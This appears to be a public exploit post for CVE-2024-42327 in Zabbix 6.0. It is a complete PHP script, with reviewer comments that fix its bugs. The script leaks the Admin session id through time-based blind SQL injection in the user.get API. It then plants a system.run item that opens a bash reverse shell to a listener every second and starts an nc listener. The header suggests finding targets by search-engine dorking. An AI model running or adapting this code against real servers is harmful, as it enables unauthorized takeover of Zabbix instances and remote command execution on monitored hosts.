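============================================================================================================================================= | # Title : Zabbix server v 6.0.32rc1 PHP Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://www.zabbix.com/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: The following code exploits the CVE-2024-42327 vulnerability, performs identity verification, leaks the API token, and then sends code to reverse the shell [+] save code as poc.php . [+] Set Target : line 141 [+] USage : C:\www>php 2.php [+] PayLoad :
<?php
/*
 * Reviewer notes on this PoC.
 *
 *  - Despite the banner, what the code below exploits is a time-based blind SQL
 *    injection, not PHP code injection: the second "selectRole" field of a
 *    user.get call is concatenated into the SQL that resolves the user's role
 *    (CVE-2024-42327), and a SLEEP() subquery is used as the oracle.
 *  - Chain: log in with the low-privileged API account -> leak the active
 *    session id of userid=1 (Admin) from zabbix.sessions one character per
 *    request -> use that session to item.create a system.run[] item on the
 *    first host returned by host.get -> the agent polls that item every second
 *    and connects back to the listener.
 *  - The last step only works where the target agent permits system.run[*]
 *    (AllowKey/DenyKey in the agent configuration) -- verify on the target.
 *    Each poll spawns a fresh shell until the item is removed, so delete the
 *    created item (its itemid is printed) once you are done.
 *  - Everything between the opening PHP tag and the first "jsonrpc" key was
 *    lost when this page was extracted; $headers and the zabbixAuthenticate()
 *    signature are reconstructed from how the rest of the script uses them.
 *  - Defects fixed relative to the original listing: the timing oracle compared
 *    the last 5 bytes of the HTTP body with the delay (a leftover from a Python
 *    port using response.elapsed) and therefore never matched; MID() is
 *    1-based so the 0..31 loop skipped the first character and never asked for
 *    the last; "tun0" is an interface name, which bash's /dev/tcp cannot use;
 *    shell_exec() buffers nc's output so the shell was never interactive; the
 *    $proxy setting was never applied; transport errors were silently ignored.
 */

// Reconstructed: the Zabbix JSON-RPC endpoint expects a JSON-RPC content type.
$headers = ['Content-Type: application/json-rpc'];

/**
 * POST one JSON-RPC request to the Zabbix API and return the raw response body.
 *
 * Uses $GLOBALS['headers'] for the request headers and, when set, $GLOBALS['proxy']
 * as the curl proxy, matching how the rest of this script is configured.
 *
 * @param string      $url    api_jsonrpc.php endpoint
 * @param string      $method API method name, e.g. "user.get"
 * @param array       $params method parameters
 * @param string|null $auth   session id for authenticated calls, null for user.login
 * @return string|false raw response body, or false on a transport failure
 *                      (the curl error is printed before returning)
 */
function zabbixApiCall(string $url, string $method, array $params, ?string $auth = null)
{
    $request = [
        'jsonrpc' => '2.0',
        'method'  => $method,
        'params'  => $params,
    ];
    if ($auth !== null) {
        // Zabbix 6.0 still accepts the session id in the "auth" body field.
        $request['auth'] = $auth;
    }
    $request['id'] = 1;

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => json_encode($request),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HTTPHEADER     => $GLOBALS['headers'],
        // PoC convenience: targets commonly run self-signed certificates.
        // This disables TLS peer verification for every request.
        CURLOPT_SSL_VERIFYPEER => false,
    ]);
    if (!empty($GLOBALS['proxy'])) {
        curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy']);
    }

    $response = curl_exec($ch);
    if ($response === false) {
        echo "[-] curl error while calling $method: " . curl_error($ch) . "\n";
    }
    curl_close($ch);

    return $response;
}

/**
 * Log in with the low-privileged account and return its session id.
 *
 * The account only needs API access; the Admin session is leaked afterwards
 * through the SQL injection, so logging in as Admin here defeats the purpose.
 * Exits the script when the login is rejected or the call fails.
 *
 * @return string session id returned by user.login
 */
function zabbixAuthenticate(string $url, string $username, string $password): string
{
    $response = zabbixApiCall($url, 'user.login', [
        'username' => $username,
        'password' => $password,
    ]);
    $responseJson = json_decode((string) $response, true);

    if (isset($responseJson['result'])) {
        echo "[+] تم تسجيل الدخول بنجاح! التوكن API: " . $responseJson['result'] . "\n";
        return $responseJson['result'];
    }

    echo "[-] فشل تسجيل الدخول. الاستجابة: " . $response . "\n";
    exit();
}

/**
 * Send one boolean/time-based probe through the user.get selectRole injection.
 *
 * The second selectRole entry is not a column name but a SQL fragment: if the
 * character at $position (1-based, MySQL MID()) of the $row-th active session
 * of userid=1 equals $char, the server sleeps $sleepTime seconds; otherwise it
 * sleeps 0. The database name "zabbix" is hard-coded in the subquery; adjust it
 * if the target uses a different schema name.
 *
 * @param string $url       API endpoint
 * @param string $authToken session id of the low-privileged account
 * @param int    $position  1-based character index into the session id
 * @param string $char      candidate character
 * @param int    $sleepTime delay (seconds) that signals a match
 * @param int    $row       which active session of userid=1 to read (LIMIT $row,1)
 * @return string|false raw response body (only its timing matters to callers)
 */
function sendInjection(string $url, string $authToken, int $position, string $char, int $sleepTime, int $row)
{
    $injectedRoleField = "name AND (SELECT * FROM (SELECT(SLEEP($sleepTime - (IF(ORD(MID((SELECT sessionid FROM zabbix.sessions WHERE userid=1 and status=0 LIMIT $row,1), $position, 1))=" . ord($char) . ", 0, $sleepTime)))))BEEF)";

    return zabbixApiCall($url, 'user.get', [
        'output'     => ['userid', 'username'],
        'selectRole' => ['roleid', $injectedRoleField],
        'editable'   => 1,
    ], $authToken);
}

/**
 * Recover one character of the Admin session id by timing each candidate.
 *
 * A candidate is accepted when the round trip took at least $sleepTime
 * seconds. An upper bound is deliberately not applied: the SLEEP() runs once
 * per role row the query touches, so a match can take a multiple of
 * $sleepTime. If the target's normal latency approaches $sleepTime, raise it.
 *
 * @param int    $position 1-based character index (see sendInjection)
 * @param string $charset  candidate characters, tried in order
 * @return string|null the matching character, or null if none of $charset matched
 */
function extractApiToken(string $url, string $authToken, int $position, string $charset, int $sleepTime): ?string
{
    foreach (str_split($charset) as $candidate) {
        $startedAt = microtime(true);
        sendInjection($url, $authToken, $position, $candidate, $sleepTime, 0);
        $elapsed = microtime(true) - $startedAt;

        if ($elapsed >= $sleepTime) {
            return $candidate;
        }
    }

    return null;
}

/**
 * Return [hostid, interfaceid] of the first host visible to the leaked session.
 *
 * On a default install the first host is typically the Zabbix server itself,
 * but that is not guaranteed; the script does not let you choose a host.
 * Either element is null when the call fails, returns no hosts, or the first
 * host has no interface.
 *
 * @return array{0: string|null, 1: string|null}
 */
function getHostIds(string $url, string $apiTokenAdmin): array
{
    $response = zabbixApiCall($url, 'host.get', [
        'output'           => ['hostid', 'host'],
        'selectInterfaces' => ['interfaceid'],
    ], $apiTokenAdmin);
    $responseJson = json_decode((string) $response, true);

    $firstHost = $responseJson['result'][0] ?? null;
    if ($firstHost === null) {
        echo "[-] لم يتم العثور على أجهزة في الاستجابة.\n";
        return [null, null];
    }

    return [
        $firstHost['hostid'] ?? null,
        $firstHost['interfaces'][0]['interfaceid'] ?? null,
    ];
}

/**
 * Create a Zabbix-agent item whose key runs a bash reverse shell every second.
 *
 * type 0 = Zabbix agent item, value_type 1 = character. The agent must allow
 * system.run[*] for the key to execute. The item keeps firing on every poll
 * until it is deleted, so the created itemid is printed for cleanup.
 *
 * @param string $listenIp   IP address or hostname reachable from the target
 * @param int    $listenPort listener port
 * @return string|null itemid of the created item, or null on failure
 */
function sendReverseShellRequest(string $url, string $apiTokenAdmin, $hostId, $interfaceId, string $listenIp, int $listenPort): ?string
{
    $response = zabbixApiCall($url, 'item.create', [
        'name'        => 'rce',
        'key_'        => "system.run[bash -c \"bash -i >& /dev/tcp/$listenIp/$listenPort 0>&1\"]",
        'delay'       => 1,
        'hostid'      => $hostId,
        'type'        => 0,
        'value_type'  => 1,
        'interfaceid' => $interfaceId,
    ], $apiTokenAdmin);
    $responseJson = json_decode((string) $response, true);

    $itemId = $responseJson['result']['itemids'][0] ?? null;
    if ($itemId === null) {
        echo "[-] item.create failed: " . $response . "\n";
        return null;
    }

    echo "[+] item created (itemid $itemId) - delete it when finished, it re-runs every second\n";
    return (string) $itemId;
}

/**
 * Turn the configured listener value into something bash's /dev/tcp can use.
 *
 * An IP address is returned as-is. Otherwise the value is treated as a local
 * interface name (e.g. "tun0") and its first IPv4 address is looked up with
 * net_get_interfaces() (PHP >= 7.3). Exits when nothing usable is found,
 * because a bare interface name would make the agent's connect-back fail.
 */
function resolveListenAddress(string $listenIp): string
{
    if (filter_var($listenIp, FILTER_VALIDATE_IP) !== false) {
        return $listenIp;
    }

    if (function_exists('net_get_interfaces')) {
        $interfaces = net_get_interfaces();
        foreach ($interfaces[$listenIp]['unicast'] ?? [] as $addr) {
            $candidate = $addr['address'] ?? '';
            if (filter_var($candidate, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
                return $candidate;
            }
        }
    }

    echo "[-] listenIp '$listenIp' is neither an IP address nor a local interface with an IPv4 address; set it to the address the target can reach.\n";
    exit(1);
}

// ---- configuration ---------------------------------------------------------
$zabbixUrl  = "http://example.com/api_jsonrpc.php";
$username   = "admin";   // low-privileged account with API access (not Admin itself)
$password   = "admin";
$listenIp   = "tun0";    // IP address, or a local interface name to resolve
$listenPort = 4444;
$threads    = 10;        // unused: this PHP port extracts characters sequentially
$sleepTime  = 1;         // seconds; raise it if the target's latency is close to this
$row        = 0;         // unused: extractApiToken() always reads the first active session
$length     = 32;        // Zabbix session ids are 32 characters
$charset    = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
$proxy      = null;      // e.g. "http://127.0.0.1:8080"; null for no proxy

// ---- 1. authenticate as the low-privileged account -------------------------
$apiToken = zabbixAuthenticate($zabbixUrl, $username, $password);

// ---- 2. leak the Admin session id one character at a time ------------------
// MySQL MID() is 1-based, so positions run 1..$length.
$apiTokenAdmin = '';
for ($position = 1; $position <= $length; $position++) {
    $char = extractApiToken($zabbixUrl, $apiToken, $position, $charset, $sleepTime);
    if ($char === null) {
        // Continuing would silently produce a shorter, wrong session id.
        echo "\n[-] no character matched at position $position; aborting (raise \$sleepTime or check the charset)\n";
        exit(1);
    }
    $apiTokenAdmin .= $char;
    echo "\r[*] استخراج التوكن API للمسؤول: " . $apiTokenAdmin;
    flush();
}

// ---- 3. pick a host and plant the system.run[] item ------------------------
echo "\n[*] الحصول على معرّفات الأجهزة ...\n";
[$hostId, $interfaceId] = getHostIds($zabbixUrl, $apiTokenAdmin);

if ($hostId && $interfaceId) {
    echo "[*] بدء الاستماع وإرسال الـ reverse shell ...\n";
    sendReverseShellRequest($zabbixUrl, $apiTokenAdmin, $hostId, $interfaceId, resolveListenAddress($listenIp), $listenPort);
    // passthru() keeps nc attached to this terminal; shell_exec() would buffer
    // its output until nc exits, so the shell would never be interactive.
    // The item polls every second, so starting the listener afterwards is fine.
    passthru('nc -lnvp ' . escapeshellarg((string) $listenPort));
} else {
    echo "[-] فشل الحصول على معرّف الجهاز أو الواجهة.\n";
}
?>
Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================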